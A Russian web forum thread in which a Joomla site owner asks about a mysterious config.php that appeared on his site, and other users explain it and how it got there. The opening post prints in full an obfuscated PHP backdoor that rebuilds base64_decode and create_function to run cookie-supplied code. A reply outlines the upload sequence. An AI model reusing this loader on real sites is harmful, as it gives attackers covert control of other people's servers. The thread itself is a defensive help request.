0 Пользователей и 1 Гость просматривают эту тему.
  • 9 Ответов
  • 926 Просмотров
*

sabnok

  • Осваиваюсь на форуме
  • 128
  • 1
Кто то залил в корень сайта файл config.php  с таким содержанием, что это такое?) Что делает этот код? Антивирус его не определяет как вирус, на сайте все чисто.



\<?php $ej = str_replace("eo","","eoseoteoreo_reoeeopeoleoaeoceoe"); $dd="JGapM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkapYSk9PSdmcycapgJiYgapJGMoJGEappPapjMpe"; $yt="lZ1ap9yZXBsYWNlapKGFycmF5apKapCcvW15cdzap1cc10vJywnL1xapzLycappLCBhcnJheapSgnJywnKycpLapCBqapbap2a"; $se="pluKGFycmF5X3NsaWNaplKapCapRhLCRjKCRhKapS0zapKSkpKapSk7ZWNobyAnapPC8nLapiRrLic+apJzt9"; $uiz="yRrapPSc1Zap2ap16MzapMnO2apVjaG8gJzwnLiapRrLic+JztldmFsapKGapJhc2U2NF9kZWNapvZGUocHJ"; $axb = $ej("z", "", "zbzase6z4z_zdzezczozdze"); $oj = $ej("d","","cdrdeadted_dfdundcdtiodn"); $nfh = $oj("", $axb($ej("ap", "", $dd.$uiz.$yt.$se))); $nfh(); ?>
*

voland

  • Профи
  • 9497
  • 422
  • Эта строка съедает место на вашем мониторе
*

winstrool

  • Завсегдатай
  • 770
  • 41
  • Свободен для работы
Re: Кто то залил в корень сайта файл
« Ответ #2 : 17.12.2015, 17:10:13 »
Это бегдор, который позволяет вертеть вашим сайтом как хочется, антивирус и не спалит, код генерированый, тут нужны специализированные программы
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

draff

  • Практически профи
  • 2770
  • 171
  • step by step
Re: Кто то залил в корень сайта файл
« Ответ #3 : 17.12.2015, 17:28:29 »
Советую поискать еще такой же файл config.php , в файлах сайта
Вряд ли один файл
*

sabnok

  • Осваиваюсь на форуме
  • 128
  • 1
Re: Кто то залил в корень сайта файл
« Ответ #4 : 17.12.2015, 17:48:00 »
А как его залили на сайт) версия Joomla 3.4.5 ничего лишнего нету. Проверял антивирусом на хостинге - ничего не нашел больше.
В логах нашел записи
86.123.69.119 - - [17/Dec/2015:10:30:37 +0300] "GET / HTTP/1.1" 200 32849 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:39 +0300] "GET / HTTP/1.1" 200 35301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:40 +0300] "GET /config.php HTTP/1.1" 200 170 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"

Такой файл config.php с кодом безопасно держать на компьютере?
« Последнее редактирование: 17.12.2015, 17:55:55 от sabnok »
*

winstrool

  • Завсегдатай
  • 770
  • 41
  • Свободен для работы
Re: Кто то залил в корень сайта файл
« Ответ #5 : 17.12.2015, 18:08:27 »
А как его залили на сайт) версия Joomla 3.4.5 ничего лишнего нету. Проверял антивирусом на хостинге - ничего не нашел больше.
В логах нашел записи
86.123.69.119 - - [17/Dec/2015:10:30:37 +0300] "GET / HTTP/1.1" 200 32849 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:39 +0300] "GET / HTTP/1.1" 200 35301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:40 +0300] "GET /config.php HTTP/1.1" 200 170 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"

Такой файл config.php с кодом безопасно держать на компьютере?
ну все правильно, не патченая версия, тут на форуме уже разжевывался этот вопрос, только самые ленивые еще не вкурсе, что можно почитать соседние ветки и устранить проблему... а если еще покажите домен, я вам тоже рядышком файлик положу)))
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

sabnok

  • Осваиваюсь на форуме
  • 128
  • 1
Re: Кто то залил в корень сайта файл
« Ответ #6 : 17.12.2015, 18:47:52 »
ну все правильно, не патченая версия, тут на форуме уже разжевывался этот вопрос, только самые ленивые еще не вкурсе, что можно почитать соседние ветки и устранить проблему... а если еще покажите домен, я вам тоже рядышком файлик положу)))

Ну атак в логах нету нигде подобных которые в соседних ветках обсуждаються) После этого уже обновился, но может надо поменять пароль от админки и базы данных и перфикс поменять? ведь вроде как злоумышленники получают эти данные
*

winstrool

  • Завсегдатай
  • 770
  • 41
  • Свободен для работы
Re: Кто то залил в корень сайта файл
« Ответ #7 : 17.12.2015, 19:00:11 »
Ну атак в логах нету нигде подобных которые в соседних ветках обсуждаються) После этого уже обновился, но может надо поменять пароль от админки и базы данных и перфикс поменять? ведь вроде как злоумышленники получают эти данные
Кидайте домен в ПМ покажу, этот тип атаки так и реализуется, первый запрос к любой странице, для приобритении сессии, второй для заливки шелла, третий для его чека что он залился
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

mistbow

  • Осваиваюсь на форуме
  • 68
  • 4
Re: Кто то залил в корень сайта файл
« Ответ #8 : 26.12.2015, 03:33:43 »
Тоже сегодня прилетело на десятке сайтов (((
Ладно бы только в корне, о всем папочкам и подпапочкам до самых низов напихали... хрен вычистишь проще вообще тупо все переустановить!
Надеюсь хоть бузы-то не попортили чем-нить эдаким (((
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Проверка на вирусы: как не удалить нужный файл

Автор Vosblog

Ответов: 4
Просмотров: 164
Последний ответ 05.09.2017, 23:12:57
от ELLE
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 589
Просмотров: 191960
Последний ответ 06.08.2017, 12:41:32
от winstrool
В корне сайта появляется файл с именем ".bt" (без ковычек)

Автор maestra

Ответов: 24
Просмотров: 2208
Последний ответ 26.07.2017, 12:09:01
от winstrool
Вынос configuration.php за пределы корня сайта

Автор Sulpher

Ответов: 10
Просмотров: 11128
Последний ответ 18.06.2017, 22:24:19
от winstrool
IPSecure - защита сайта от ботов

Автор SeBun

Ответов: 1
Просмотров: 581
Последний ответ 09.05.2017, 12:09:17
от SeBun